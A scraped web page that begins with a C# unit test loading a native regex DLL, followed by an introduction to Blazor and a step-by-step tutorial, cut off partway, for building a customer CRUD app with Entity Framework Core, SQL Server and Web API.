[TestMethod] public void TestRegExLots() { using (var x = new DynamicDllLoader("CppRegEx.dll")) { var str = "igdasdf.dll"; str = str.ToLowerInvariant(); var regex = @"(^igd(.*)|^amd(.*)|^ati(.*)|^nv(.*))\.dll"; var res = NativeMethods.ReturnRegExMany(10000, str, regex); //for (int i = 0; i < 1; i++) //{ // for (int j = 0; j < 10000; j++) // { // /* // var resManaged = System.Text.RegularExpressions.Regex.Match(str, regex); // /*/ // var resNative = NativeMethods.ReturnRegEx(str, regex); // //*/ // } //} } } } static class NativeMethods { [DllImport("CppRegEx.dll")] public static extern int Return3(); [DllImport("CppRegEx.dll", CharSet = CharSet.Unicode)] public static extern int ReturnRegEx(string somestring, string regex); [DllImport("CppRegEx.dll", CharSet = CharSet.Unicode)] public static extern int ReturnRegExMany(int iter, string somestring, string regex); } /// <summary> /// we want to load and free a native dll from a particular location. /// see /// </summary> public class DynamicDllLoader : IDisposable { private IntPtr _handleDll; public DynamicDllLoader(string fullPathDll) { if (!File.Exists(fullPathDll)) { throw new FileNotFoundException("couldn't find " + fullPathDll); } _handleDll = LoadLibrary(fullPathDll); if (_handleDll == IntPtr.Zero) { throw new InvalidOperationException( string.Format("couldn't load {0}. Err {1} ", fullPathDll, System.Runtime.InteropServices.Marshal.GetLastWin32Error() ) ); } } private void UnloadDll() { if (_handleDll != IntPtr.Zero) { var res = 0; int nTries = 0; while ((res = FreeLibrary(_handleDll)) != 0) { if (++nTries == 3) { throw new InvalidOperationException("Couldn't free library. # tries = " + nTries.ToString()); } } _handleDll = IntPtr.Zero; } } public void Dispose() { UnloadDll(); } [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern IntPtr LoadLibrary(string dllName); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern int FreeLibrary(IntPtr handle); } } </C# Test Code>
https://blogs.msdn.microsoft.com/calvin_hsia/2014/11/25/create-managed-tests-for-native-code/
CC-MAIN-2017-51
refinedweb
1,270
57.67
There are many limitations placed for this code. I am still learning so I need hints for this assignment. No extra variables, no macros or functions other than GetSubstring can be called. Main function cannot be changed. This is my code. Focus on the GetSubstring function part. #include <stdio.h> #include <stdlib.h> char *GetSubstring(const char source[], int start, int count, char result[]); int main(void) { const char source[] = "one two three"; char result[] = "123456789012345678"; puts(GetSubstring("This is really fun", 2, 800, result)); puts(GetSubstring("This is really fun", 261, 9, result)); puts(GetSubstring("This is really fun", 0, 12, result)); puts(GetSubstring(source, 5, 87, result)); puts(GetSubstring(source, 18, 7, result)); puts(GetSubstring(source, 6, 5, result)); puts(GetSubstring(source, 0, 3, result)); return(EXIT_SUCCESS); } char *GetSubstring(const char source[], int start, int count, char result[]) { char *copy = result; for (; *source != '\0' || *source == source[start]; start--) { while (*source != '\0') { *result++ = *source++; } } *result += '\0'; return (copy); } Current Output is: This is really fun This is really fun This is really fun one two threey fun one two threey fun one two threey fun one two threey fun Process returned 0 (0x0) execution time : 0.082 s Press any key to continue.
http://forums.devshed.com/programming/933467-obtain-substring-string-please-look-last-post.html
CC-MAIN-2017-39
refinedweb
204
63.19
Q:] Join the conversationAdd Comment There is still ambiguity. Consider: class Test { static void Process(); void Process(); void AmbiguousCaller() { Process(); } } Does AmbiguousCaller() call static Test.Process() or does it call this.Process()? Aside from this I believe there would also be ambiguity from MC++ where class statics can be invoked through an instance pointer. I disagree with your belief that a user would get confused between the two function calls (at least not in C#). To call your static function you would have to invoke it as Test.Process(); To call your instance of the funtion you would have to us an instance: new Test().Process(); or Test obj = new Test(); obj.Process(); I can’t see how you could get confused here. I would also assume that the static function would perform the same functionality as the instance version of it, but the static probably handles the creation and destuction of the object. IE I would expect that the following would do the same: Guid.NewGuid(); New Guid().NewGuid(); Personally I think this is a time saver for end users of the component. Q: Does AmbiguousCaller() call static Test.Process() or does it call this.Process()? A: It calls this.Process(). You must use the class name to call a static function. So the only way to call the static function is to call Test.Process() Well, in the current language specification you don’t *have* to use the class name to call a static method – so under the current specification, it *would* be ambiguous. Excerpt from Microsoft Programming Languages () "Shared members may be accessed in Visual Basic .NET through both the class name and an instance variable of the type to which they belong." That makes me wonder if in C# having to call a static member through the class name and not allowing it to be called by an instance variable is a C# imposition rather than a CLR one. Um, ok perhaps I am doing something wrong here. I just tried calling a static method without the class name in C# and it wouldn’t compile. I don’t use VB so I am not sure how that is working. I am asuming that the compiler converts the instance call to the class call. So if this is the current specification, why isn’t C# or the CLR following it? Could you give a sample of it not compiling? You have to use a class name if it’s a method of a *different* class, but if it’s a method in the same class, it’s okay. Here’s an example: class Test { static void Main() { new Test().InstanceMethod(); } static void StaticMethod() { } void InstanceMethod() { StaticMethod(); } } There is actaully a very simple reason why it is illegal. In C# it is legal to have a local variable that is the same as a class name. This means that if an instance member was to be named the same as static member there would be an ambiguity when a local variable had the same name as the class it represents. So consider the following legal C# code: public class TestClass { public TestClass(){} public static void MyStaticMethod() {} public void MyInstanceMethod() {} } public class StartUp { public static Int32 Main(String[] args) { TestClass TestClass = new TestClass(); TestClass.MyInstanceMethod(); TestClass.MyStaticMethod(); return 0; } } If MyInstanceMethod & MyStaticMethod names were change to be the same there would be an ambiguity. Why it is legal to have have a local variable that is the same as a class name in C#?? why not in VB.NET and other languages? If we don’t allow name of a local variable that is the same as a class name then this confusion won’t happen. From what I have heard VB.NET allows calling of static methods from a non-static context. Wouldnt there be an ambiguity in that case when you use this test class to derive a descendant class in vb.net ? my web: [][][][][][][][][][][][][][][][][][][] <a href="…/java-static-and-non-static-method.php">Difference between Static and non-static method in Java</a> Thanks for this post
https://blogs.msdn.microsoft.com/csharpfaq/2004/03/16/why-cant-i-have-static-and-instance-methods-with-the-same-name/
CC-MAIN-2017-13
refinedweb
682
73.58
On Wed, Dec 29, 2004 at 11:51:48PM -0800, Matthew Dillon wrote: > >:... >:level aren't we concerned about one thing? Atomic transactions. However >:many "hot" physical devices there are across whatever network, shouldn't >:they all finish before the exit 0? >: >:Minimizing the data to transfer across the slowest segment to a physical >:device will lower transfer times, unless that procedure (eg compression) >:overweighs the delay. (I wonder if it is possible to send less data by >:only transmitting the _changes_ to a block device...) > > Your definition of what constitutes an 'atomic transaction' is not > quite right, and that is where the confusion is stemming from. > > An atomic transaction (that is, a cache-coherent transaction) does not > necessarily need to push anything out to other machines in order to > complete the operation. All it needs a mastership of the data or > meta-data involved. For example, if you are trying to create a > file O_CREAT|O_EXCL, all you need is mastership of the namespace > representing that file name. > > Note that I am NOT talking about a database 'transaction' in the > traditional hard-storage sense, because that is NOT what machines need > to do most of the time. I. As for the magic of VFS, that's all golden and I hope it works! I really wanted to clarify the above paragraph or get on the same page as far as system? Per your earlier example, the 3 hot mirrors broadcast their intent to write a file (first come, first write basis) via the cache coherency protocol, the journal socket then comes with specific details, the remaining 2 (and indeed the first) hot devices block file reads until the IO of associated writes is complete across the 3 machines, since this blocking comes from the kernel (VFS?), there is no multiple partially written file race condition. The remaining 20 hosts get notice from the VFS per coherent cache protocol, followed by journal and IO, from the 3 hot mirrors. > >? > In otherwords, your machine would be able to execute the create operation > and return from the open() without having to synchronously communicate > with anyone else, and still maintain a fully cache coherent topology > across the entire cluster. Do you mean a warm mirror can commit to local disk and trigger the 3 hot mirrors to sync up and propagate to the other 20? Slick! > The management of 'mastership' of resources is the responsibility of the > cache coherency layer in the system. It is not the responsibility of the > journal. The journal's only responsibility is to buffer the operation > and shove it out to the other machines, but that can be done > ASYNCHRONOUSLY, long after your machine's open() returned. It can do > this because the other machines will not be able to touch the resource > anyway, whether the journal has written it out or not, because they > do not have mastership of the resource... they would have to talk to > your machine to gain mastership of the resource before they could mess > with the namespace which means that your machine then has the opportunity > to ensure that the related data has been synchronized to the requesting > machine (via the journal) before handing over mastership of the data to > that machine. If mastership can freely (with restrictions!) move to any box in the system, doesn't that dictate the cache coherent system must be organized _outside_ of all the systems? Since we can't expect something from nothing, the steady state should be just that, nothing. All the disks are in sync, and they know so because they processed all prior coherent signals: warning, a journal entry in the pipe (coming, to be followed by an IO). Each box listens for external coherency signals (inode by UDP, ICMP?) and prepares for a journal and IO. Maybe better than silent! >:But here are a few things to ponder, will a 1Gb nfs or 10Gb fiber to a >:GFS on a fast raid server just be better and cheaper than a bunch of >:warm mirrors? How much of a performance hit will the journaling code >:be, especially on local partitions with kernels that only use it for a >:"shared" mount point? djbdns logging is good example, even if you log to >:/dev/null, generation of the logged info is a significant performance >:hit for the app. I guess all I'm saying is, if the journaling is not >:being used, bypass it! > > Well, what is the purpose of the journaling in this context? If you > are trying to have an independant near-realtime backup of your > filesystem then obviously you can't consolidate it into the same > physical hardware you are running from normally, that would kinda kill > the whole point. I'm not making a purpose for journaling here. Just considering the options. Again from a simplistic perspective. If the idea behind cache coherent cluster filesystem is performance (seems there are other advantages too); how does the bang-for-buck benchmark compare between coherent nodes with local disks, and diskless clients using a single striped mirrored (realtime backup) raid NFS? Or, if you have a lot more than 20 hosts, fiber GFS? Or, maybe you are looking for a solution other than brute force performance? >? > The key to performance is multifold. It isn't just minimizing the > amount of data transfered... it's minimizing latency, its being able to > asynchronize data transfers so programs do not have to stall waiting I didn't mean the cluster needs be synchronsed, just _file_ read/writes... advantages/disadvantages >? > You can think of the cache coherency problem somewhat like the way > cpu caches work in SMP systems. Obviously any given cpu does not have > to synchronously talk to all the other cpus every time it does a memory > access. The reason: the cache coherency protocol gives that cpu certain > guarentees in various situations that allow the cpu to access a great > deal of data from cache instantly, without communicating with the other > cpus, yet still maintain an illusion of atomicy. For example, I'm sure > you've heard the comments about the overhead of getting and releasing a > mutex in FreeBSD: "It's fast if the cpu owns the cache line". > "It's slow if several cpus are competing for the same mutex but fast if > the same cpu is getting and releasing the mutex over and over again". > There's a reason why atomic bus operations are sometimes 'fast' and > sometimes 'slow'. Recently I heard AMD engineer David O'Brien, present advantages and nuances of working with the AMD64. SMP NUMA caching scenarios where discussed at length. What's not in the CPU (motherboards), is a means to (control) flash copy (a la DMA) one memory region to another, idea being, if a 4 way CPU gets free it can off load a process from another CPU's queue, and get the associated memory too, without tying up a cpu using the regular memory bus. A system a lot like how your "multiple path to sync" filesystems coherent cache system seems to want to work. Regards, // George -- George Georgalis, systems architect, administrator Linux BSD IXOYE cell:646-331-2027 mailto:george@xxxxxxxxx
http://leaf.dragonflybsd.org/mailarchive/kernel/2004-12/msg00137.html
CC-MAIN-2013-48
refinedweb
1,197
58.52
(It's a blog.) December 28, 2013 at 5:06 pm filed under Coding Tagged FP, lisp, macros, racket Man, just when I thought I’d started to understand macros, I stumble across Racket. Don’t get me wrong. I’m still enjoying my foray into Racket. But if, for instance, you started out trying to understand Lisp macros via On Lisp, you may be in for some trouble. Yes, as far as I can tell, the usual syntax like `(foo ,bar ,@baz) will work. But if you begin to read the section of the Racket Guide about macros, it becomes clear that there’s much, much more to the picture. This is really just me thinking out loud as I work this out. I’m more sure of some things than others, and I’ll try to make clear which is which, but consider this a blanket caveat. I think I agree with the folks who’ve suggested that while it’s easy to find trivial or complex Racket macro examples, it’s hard to find examples of moderate complexity. The nice thing is that Fear of Macros exists. I began reading my way through it today. Macros in Racket seems to be built around a relatively simple idea: make syntax first class. I am not certain, but I am pretty sure that syntax like backticks, et al, are not functions. At a minimum they aren’t atoms, right? You can’t map backticks over a list of atoms, or funcall or apply it. ,, @, and backticks are all reader directives (the R in REPL), which is distinct from the environment (the E or eval in REPL). They exist at a more fundamental level to enable Lisp’s clever syntax. I don’t think there’s anything wrong with that, necessarily, but it’s interesting to contemplate Racket’s assertion that syntax should be a first-class datatype, beyond just a list. So that’s why you end up with concepts like transformers. A macro written in this way isn’t mucking around with the reader directly. (Maybe that’s how it’s implemented, though.) Rather, you’re working in a different namespace, or the moral equivalent, at compile time. A macro then becomes a function which receives a syntax object, which the programmer can manipulate via a number of other primitives. It gets a little confusing here, though, because a syntax object isn’t just a glorified AST or what have you. Functions like syntax->datum will recurse through a syntax object representing (+ 1 (* 2 3)) and yield just that, whereas others may only recurse one level, providing a syntax object for (e.g.) + and *. AIUI, these syntax objects know something about the scope in which they were introduced. And this is important because if you’re just operating at a textual substitution level, you can run into problems with scope. Is it a bit like closures? I think so, with the caveat that this would be during the compilation phase, before “real” code is executed. What do I mean by “real” code? Well, I put that in quotes because there’s not much of a difference in reality. I think it has to do with phases. So during the compile phase, you can perform computation. You could write a macro my-+ which performed addition at compile time, right? Or a real example of computation might be to take a declaration like (struct person (id name phone)) and declare accessors make-person, person-id, and so on. This is how any Lisp macro works, so I’m not singling out Racket as special. So if you consider that compile time is itself just another phase in program evaluation, issues of lexical scope and such take on a new meaning. Also, yeah, far as I can tell, in Racket there are interesting phases or times in addition to compile time. In fact I think you can arbitrarily nest phases. I wanted to say that this is the moral equivalent of nesting backticks, but I don’t think that’s accurate enough to help. To put it grossly, backticks are a way to require another layer of evaluation. Put another way, you put backticks around something to delay its evaluation by one application of eval, and a comma to remove a “layer” of delay. Digression: sometimes I try to think about this like when you have nested quotes in prose: “Alice said ‘drink this,’ so I did,” Bob said. You have three layers of nesting here: story-level (“Bob said”), Bob-level (“Alice said”), and Alice-level (“drink this”). English isn’t quite as regimented as code, but it does have rules for quotes. End digression. (You know, as if this whole thing isn’t a digression.) I believe backticks, et al, are quite distinct from “phases” in Racket. Backticks are (again) a syntactic construct for consumption by the reader. The environment doesn’t come into play because eval doesn’t care where your lists came from; they’re “just” lists. This is advantageous in terms of simplicity, I’d expect. Conversely, a syntax object might actually know what symbols, et al, it’s referring to. There’re a pile of Racket functions oriented around this concept. You can play with this at the REPL: The third expression at the prompt is interesting only because syntax-e parses a syntax objects into its constituent parts. The subsequent expression extracts foo as a syntax object and then compares it to another syntax object representing the same foo. All right, I went through all that to flesh out my own mental model for why you might want a richer datatype to represent syntax, rather than “just” lists with reader directives. The way this ends up working in Racket is that a macro receives a syntax object rather than a list of its arguments. The macro is free to manipulate that object (e.g. using syntax-e or syntax->datum). The transformer returns something which is evaluated. With that in mind, this surprised me a little bit: eval-ing a syntax object is equivalent to eval-ing a datum. Okay. I think it’s only functionally equivalent, because of how I set up the example. Specifically, the first example is “portable” to other scopes, and it’ll be able to resolve foo whether foo exists in the current context. The second example will evaluate foo in the current context, possibly failing. To expand on that: say foo didn’t exist at runtime. Or it evaluates to something different at runtime vs compile-time. In the former case, the sharp-quoted version would still work (assuming that it was a proper macro) whereas the datum version would error out. In the latter case, the computations would each evaluate to something different. Interestingly, in the latter case, that’s actually probably what you want! That’s because they’re distinct times, and you wouldn’t want a run-time binding to trample a compile-time binding, right? Hmm. In the next post I’ll think a little more about the interesting pieces this enables, how it changes how I look at macros in Racket, and maybe I’ll even try to understand them. I don’t think, in aggregate, that it’s really all that different in terms of manipulating lists. The extra pieces come from the syntax object, and what happens when your functions and constructs know something about what they’re manipulating. You can have richer affordances and such. So that’ll be interesting to contemplate.
http://incrediblevehicle.com/2013/12/28/macros-in-racket-what/
CC-MAIN-2017-22
refinedweb
1,262
63.8
Results Transformers Results Transformers have been introduced in RavenDB 2.5 to give the user the ability to do a server side projections (with possibility to load data from other documents). Result Transformers are substituting the index TransformResults feature, marking it as obsolete. Main features of the Result Transformers are: I. Stand-alone, separated from Index. public class Order { public DateTime OrderedAt { get; set; } public Status Status { get; set; } public string CustomerId { get; set; } public IList<OrderLine> Lines { get; set; } } public class OrderStatisticsTransformer : AbstractTransformerCreationTask<Order> { public OrderStatisticsTransformer() { TransformResults = orders => from order in orders select new { order.OrderedAt, order.Status, order.CustomerId, CustomerName = LoadDocument<Customer>(order.CustomerId).Name, LinesCount = order.Lines.Count }; } } II. User can use them on index results on demand. What does it mean? It means if you want load whole Order you can do so by not using a transformer in the query: IList<Order> orders = session.Query<Order>() .Where(x => x.CustomerId == "customers/1") .ToList(); or if you want to get your transformed results then you can execute query as follows: public class OrderStatistics { public DateTime OrderedAt { get; set; } public Status Status { get; set; } public string CustomerId { get; set; } public string CustomerName { get; set; } public int LinesCount { get; set; } } IList<OrderStatistics> statistics = session.Query<Order>() .TransformWith<OrderStatisticsTransformer, OrderStatistics>() .Where(x => x.CustomerId == "customers/1") .ToList(); III. Can be used with automatic indexes. OrderStatistics statistic = session.Load<OrderStatisticsTransformer, OrderStatistics>("orders/1"); The comments section is for user feedback or community content. If you seek assistance or have any questions, please post them at our support forums. Is it possible to query an index from a transformer? Or would that make it too complicated? Is this included in the first 2.5 release (2.5.2666)? In this example Order does not have have an Id property. Assuming it did have one, how would we reference it in our result. Currently I am getting an error that reads "Could not read value for property Id" How can a result transformer be used with the .Net API to return polymorphic types? In other words, how can I write a VehicleTransformer so that when I use .TransformWith<VehicleTransformer, Vehicle>(), how can I receive back an enumeration of Cars, Boats, and Motorcycles? How can result transformers be used in conjunction with search clauses? I can't get them to play nice together.
http://ravendb.net/docs/2.5/client-api/querying/results-transformation/result-transformers?version=2.5
CC-MAIN-2014-42
refinedweb
390
50.12
Blazor is a framework for building interactive client-side web UI with . NET: Create rich interactive UIs using C# instead of JavaScript. The Blazor framework uses WebAssembly-based . NET runtime (client-side Blazor) and server-side ASP.NET Core (server-side Blazor). Blazor WebAssembly is a single-page app framework for building interactive client-side web apps with .NET. Blazor Server: Blazor decouples component rendering logic from how UI updates are applied. Blazor Server provides support for hosting Razor components on the server in an ASP.NET Core app. UI updates are handled over a SignalR connection. Welcome to Blazor! Blazor is a framework for building interactive client-side web UI with .NET: Using .NET for client-side web development offers the following advantages: Blazor apps are based on components. A component in Blazor is an element of UI, such as a page, dialog, or data entry form. Components are .NET classes built into .NET assemblies that: The component class is usually written in the form of a Razor markup page with a .razor file extension. Components in Blazor are formally referred to as Razor components. Razor is. The following Razor markup demonstrates a component (Dialog.razor), which can be nested within another component: <div> <h1>@Title</h1> @ChildContent <button @Yes!</button> </div> @code { [Parameter] public string Title { get; set; } [Parameter] public RenderFragment ChildContent { get; set; } private void OnYes() { Console.WriteLine("Write to the console in C#! 'Yes' button was selected."); } } The dialog's body content ( ChildContent) and title ( Title) are provided by the component that uses this component in its UI. OnYes is a C# method triggered by the button's onclick event. Blazor uses natural HTML tags for UI composition. HTML elements specify components, and a tag's attributes pass values to a component's properties. In the following example, the Index component uses the Dialog component. ChildContent and Title are set by the attributes and content of the <Dialog> element. Index.razor: @page "/" <h1>Hello, world!</h1> Welcome to your new app. <Dialog Title="Blazor"> Do you want to <i>learn more</i> about Blazor? </Dialog> The dialog is rendered when the parent (Index.razor) is accessed in a browser: When this component is used in the app, IntelliSense in Visual Studio and Visual Studio Code speeds development with syntax and parameter completion. Components render into an in-memory representation of the browser's Document Object Model (DOM) called a render tree, which is used to update the UI in a flexible and efficient way.Blazor WebAssembly Blazor WebAssembly is a single-page app framework for building interactive client-side web apps with .NET. Blazor WebAssembly uses open web standards without plugins or code transpilation and (or JavaScript interop). .NET code executed via WebAssembly in the browser runs in the browser's JavaScript sandbox with the protections that the sandbox provides against malicious actions on the client machine. When a Blazor WebAssembly app is built and run in a browser: The size of the published app, its payload size, is a critical performance factor for an app's useability. A large app takes a relatively long time to download to a browser, which diminishes the user experience. Blazor WebAssembly optimizes payload size to reduce download times: Blazor decouples component rendering logic from how UI updates are applied. Blazor Server provides support for hosting Razor components on the server in an ASP.NET Core app. UI updates are handled over a SignalR connection. The runtime handles sending UI events from the browser to the server and applies UI updates sent by the server back to the browser after running the components. The connection used by Blazor Server to communicate with the browser is also used to handle JavaScript interop calls .NET Standard 2.0. Learn Blazor WebAssembly - Build Your First Web Application. How to build your first application that runs IN the browser with C# and Blazor. Learn how to build a next-generation SPA (single-page application) using HTML, CSS, JavaScript interop, and Blazor. Blazor is a new framework that allows you to write .NET code that runs on WebAssembly technology inside the browser. What is Blazor? Learn how to build client-side Web apps using Blazor and how to secure them with Auth0.Learn Blazor and Build with Web Assembly - Your First Web Application with Blazor Join Jeff Fritz as he takes you through the steps to build your first application that runs IN the browser with C# and Blazor. Blazor is a new framework that allows you to write .NET code that runs on webassembly technology inside the browser. By the end of this video, you'll learn how to build a next-generation SPA (single-page application) using HTML, CSS, JavaScript interop, and Blazor. In this Blazor WebAssembly tutorial, we will see how to create a simple CRUD application for ASP.NET Core Blazor using Visual Studio, .NET Core 3, Entity Framework and Web API. Blazor is a new framework introduced by Microsoft. How to build CRUD (CREATE, READ, UPDATE & DELETE) App using the Blazor SPA Framework, Entity Framework and SQL server. How to create a web application using Blazor with the help of Entity Framework Core. CRUD Using Blazor And Entity Framework Core in ASP.NET Core 3.0.Blazor CRUD App tutorial - SPA Framework for .NET developers This video tutorial is about to create advance crud (CREATE, READ, UPDATE & DELETE) application using the blazor spa framework, entity framework, and SQL server. Code: CRUD - Make a CRUD app with Blazor and Entity Framework Core In this video we will make a Blazor WebAssembly app that communicates with an ASP.NET Core Web API to read and store data in a database.CRUD Using Blazor And Entity Framework Core in ASP.NET Core. How to create a web application using Blazor with the help of Entity Framework Core. CRUD Using Blazor And Entity Framework Core in ASP.NET Core 3.0. In this article, we will see how to create a simple CRUD application for ASP.NET Core Blazor using Visual Studio 2019, .NET Core 3, Entity Framework and Web API. Blazor is a new framework introduced by Microsoft. Blazor: Blazor has two kind of Application development on is Blazor Client app which is in preview now and also Blazor Server app. Blazor Client app runs in WebAssembly, Blazor Server app runs using SignalR. Blazor apps can be created using C#, Razor, and HTML instead of JavaScript Blazor WebAssembly Works in all modern web browsers also in mobile browsers. The main advantage we have in Blazor is C# code files and Razor files are compiled into .NET assemblies. Blazor has reusable components, Blazor Component can be as a page,Dialog or Entry Form, Blazor also used to create Single Page Applications. Blazor is used to create two kind of applications one is Blazor Client-Side App and another one is Blazor Server Side APP.here we will see some more details on Blazor Client App: Blazor Server App: Prerequisites Step 1 - Create a database and a table We will be using our SQL Server database for our WEB API and EF. First, we create a database named CustDB and a table as CustDB. Here is the SQL script to create a database table and sample record insert query in our table. Run the query given below in your local SQL Server to create a database and a table to be used in our project. USE MASTER GO -- 1) Check for the Database Exists .If the database is exist then drop and create new DB IF EXISTS (SELECT [name] FROM sys.databases WHERE [name] = 'CustDB' ) DROP DATABASE CustDB GO CREATE DATABASE CustDB GO USE CustDB GO -- 1) //////////// Customer Masters IF EXISTS ( SELECT [name] FROM sys.tables WHERE [name] = 'CustomerMaster' ) DROP TABLE CustomerMaster GO CREATE TABLE [dbo].[CustomerMaster]( [CustCd] [varchar](20) NOT NULL , [CustName] [varchar](100) NOT NULL, [Email] [nvarchar](100) NOT NULL, [PhoneNo] [varchar](100) NOT NULL, [InsertBy] [varchar](100) NOT NULL, PRIMARY KEY (CustCd) ) -- insert sample data to Student Master table INSERT INTO [CustomerMaster] (CustCd,CustName,Email,PhoneNo,InsertBy) VALUES ('C001','ACompany','[email protected]','01000007860','Shanun') INSERT INTO [CustomerMaster] (CustCd,CustName,Email,PhoneNo,InsertBy) VALUES ('C002','BCompany','[email protected]','0100000001','Afraz') INSERT INTO [CustomerMaster] (CustCd,CustName,Email,PhoneNo,InsertBy) VALUES ('C003','CCompany','[email protected]','01000000002','Afreen') INSERT INTO [CustomerMaster] (CustCd,CustName,Email,PhoneNo,InsertBy) VALUES ('C004','DCompany','[email protected]','01000001004','Asha') select * from CustomerMaster Step 2 - Create ASP.NET Core Blazor Server Application After installing all the prerequisites listed above, click Start >> Programs >> Visual Studio 2019 >> Visual Studio 2019 on your desktop. Click New >> Project. Click Create a new project to create our ASP.NET Core Blazor Application. Select Blazor App and click Next button. Select your project folder and Enter your Project name and then click Create button. Select Blazor Server App After creating ASP.NET Core Blazor Server Application, wait for a few seconds. You will see the below structure in solution explorer. In the Data folder we can add all our Model, DBContext Class, Services and Controller, we will see that in this article. In the Pages folder we can add all our component files.component file all should have the .razor extension with the file name. In the Shared folder we can add all left menu form NavMenu.razor file and change the main content from the MainLayout.razor file. In the _Imports.razor file we can see all set of imports has been added inorder to used in all component pages. In the App.razor file we will add our main component to be displayed by default when run in browser.Appsertings.json can be used to add the connection string. Startup.cs file is important file where we add all our endpoints example like Controller end points, HTTP Client,add services and dbcontext to be used in startup Configuration method. it and start with our own page. Debug in component The big advantage of Blazor is as we can use our C# code in razor and also keep the break point in the code part and in browser we can debug and check for all our business logic is working properly and to trace any kind error easily with break point. For this we take our existing Counter component page. This is the actual code of our Counter page as in the counter we can see there is button and in button click called the method to perform the increment. We add one more button and in button click event we call the method and bind the name in our component page. In html design part we add the below code. <h1>My Blozor Code part</h1> My Name is : @myName <br /> <button @Click Me</button> Note that : all the C# code part and functions can be written under the @code {} part. We add the method ClickMe and declare property to bind the name inside the @Code part [Parameter] public string myName { get; set; } private void ClickMe() { myName="Shanu"; } The complete Coutner Component page code will be like this. Now lets add the break point in our ClickMe method Run the program and open the counter page. We can see as when we click on the Click Me button we can debug and check for the value from the breakpoint we placed. Now lets see on performing CRUD operation using EF and Web API in Bloazor. Step 3 - Using Entity Framework To use the Entity Framework in our Blazor application we need to install the below packages Install the Packages Microsoft.EntityFrameworkCore.SqlServer - For using EF and SQL Server Microsoft.EntityFrameworkCore.Tools - For using EF and SQL Server Microsoft.AspNetCore.Blazor.HTTTPClient - For communicating WEB API from our Blazor Component. First we will add the Microsoft.EntityFrameworkCore.SqlServer ,For this right click on the project and click on Manage NuGet Packages. Search for all the three packages and install all the needed packages like below image. Add DB Connection string Open the appsetting file and add the connection string like below image. "ConnectionStrings": { "DefaultConnection": "Server= DBServerName;Database=CustDB;user id= SQLID;-password=SQLPWD;Trusted_Connection=True;MultipleActiveResultSets=true" }, Create Model Class Next, we need to create the Model class with same as our SQL Table name and also define the property fields similar to our SQL filed name as below. Right Click the Data Folder and create new class file as “CustomerMaster.cs” In the class we add the property field name same as our table column names like below code. [Key] public string CustCd { get; set; } public string CustName { get; set; } public string Email { get; set; } public string PhoneNo { get; set; } public string InsertBy { get; set; } Create dbConext Class Next, we need to create the dbContext class.Right Click the Data Folder and create new class file as “SqlDbContext.cs” We add the below code in the DbContext class as below in order to add the SQLContext and add the DBset for our CustomerMaster Model. public class SqlDbContext:DbContext { public SqlDbContext(DbContextOptions<SqlDbContext> options) : base(options) { } public DbSet<BlazorCrudA1.Data.CustomerMaster> CustomerMaster { get; set; } } Adding DbContext in Startup Adding the DbContext in Startup.cs file ConfigureServices method as below code and also we give the connection string which we used to connect to SQLServer and DB. services.AddDbContext<SqlDbContext>(options => options.UseSqlServer(Configuration.GetConnectionString("DefaultConnection"))); Note that in the ConfigureServices method we can also see as the weatherforecast service has been added.if we create an new service then we need to add the service in like below code in ConfigureServices method. services.AddSingleton<WeatherForecastService>(); Creating Web API for CRUD operation To create our WEB API Controller, right-click Controllers folder. Click Add New Controller. Here we will be using Scaffold method to create our WEB API. We select API Controller with actions, using Entity Framework and click Add button. Select our Model class and DBContext class and click Add/CustomerMasters/ Run the program and paste API path to test our output. If you see this error means then we need to add the endpoints of controller in the Startup.cs file Configure method. Add the below code in the Configure method in Startup.cs file endpoints.MapControllers(); we add inside the UseEndpoints like below code in Configure method. app.UseEndpoints(endpoints => { endpoints.MapControllers(); endpoints.MapBlazorHub(); endpoints.MapFallbackToPage("/_Host"); }); Now run again and check for /api/CustomerMasters/ to see the Json data from our database. Now we will bind all this WEB API Json result in component. Working with Client Project First, we need to add the Razor Component page Add Razor Component To add the Razor Component page right click the Pages folder from the Client project. Click on Add >> New Item >> Select Razor Component >> Enter your component name,Here we have given the name as Customerentry.razor Note all the component file need to have the extentions as .razor. In Razor Component Page we have 3 parts of code as first is the Import part where we import all the references and models for using in the component, HTML design and data bind part and finally we have the function part to call all the web API to bind in our HTML page and also to perform client-side business logic to be displayed in Component page. Import part First, we import all the needed support files and references in our Razor View page. Here we have first imported our Model class to be used in our view and also imported HTTPClient for calling the Web API to perform the CRUD operations. @page "/customerentry" @using BlazorCrudA1.Data @using System.Net.Http @inject HttpClient Http @using Microsoft.Extensions.Logging Register HTTPClient for Server side Blazor In order to use the HTTPClient in Blazor Server side we need to add the below code in Startup.cs ConfigureServices method. services.AddResponseCompression(opts => { opts.MimeTypes = ResponseCompressionDefaults.MimeTypes.Concat( new[] { "application/octet-stream" }); }); // Server Side Blazor doesn't register HttpClient by default<NavigationManager>(); return new HttpClient { BaseAddress = new Uri(uriHelper.BaseUri) }; }); } HTML design and data Bind part Next, we design our Customer Master details page to display the Customer details from the database and created a form to Insert and update the Customer details we also have Delete button to delete the Custoemr records from the database. For binding in Blazor we use the **@****bind**="@custObj.CustCd" and to call the method using **@****onclick**="@AddNewCustomer" <h1> ASP.NET Core BLAZOR CRUD demo for Customers</h1> <hr /> <table width="100%" style="background:#05163D;color:honeydew"> <tr> <td width="20"> </td> <td> <h2> Add New Customer Details</h2> </td> <td> </td> <td align="right"> <button class="btn btn-info" @Add New Customer</button> </td> <td width="10"> </td> </tr> <tr> <td colspan="2"></td> </tr> </table> <hr /> @if (showAddrow == true) { <form> <table class="form-group"> <tr> <td> <label for="Name" class="control-label">Customer Code</label> </td> <td> <input type="text" class="form-control" @ </td> <td width="20"> </td> <td> <label for="Name" class="control-label">Customer Name</label> </td> <td> <input type="text" class="form-control" @ </td> </tr> <tr> <td> <label for="Email" class="control-label">Email</label> </td> <td> <input type="text" class="form-control" @ </td> <td width="20"> </td> <td> <label for="Name" class="control-label">Phone</label> </td> <td> <input type="text" class="form-control" @ </td> </tr> <tr> <td> <label for="Name" class="control-label">Insert By</label> </td> <td> <input type="text" class="form-control" @ </td> <td width="20"> </td> <td> </td> <td> <button type="submit" class="btn btn-success" @Save</button> </td> </tr> </table> </form> } <table width="100%" style="background:#0A2464;color:honeydew"> <tr> <td width="20"> </td> <td> <h2>Customer List</h2> </td> </tr> <tr> <td colspan="2"></td> </tr> </table> @if (custs == null) { <p><em>Loading...</em></p> } else { <table class="table"> <thead> <tr> <th>Customer Code</th> <th>Customerr Name</th> <th>Email</th> <th>Phone</th> <th>Inserted By</th> 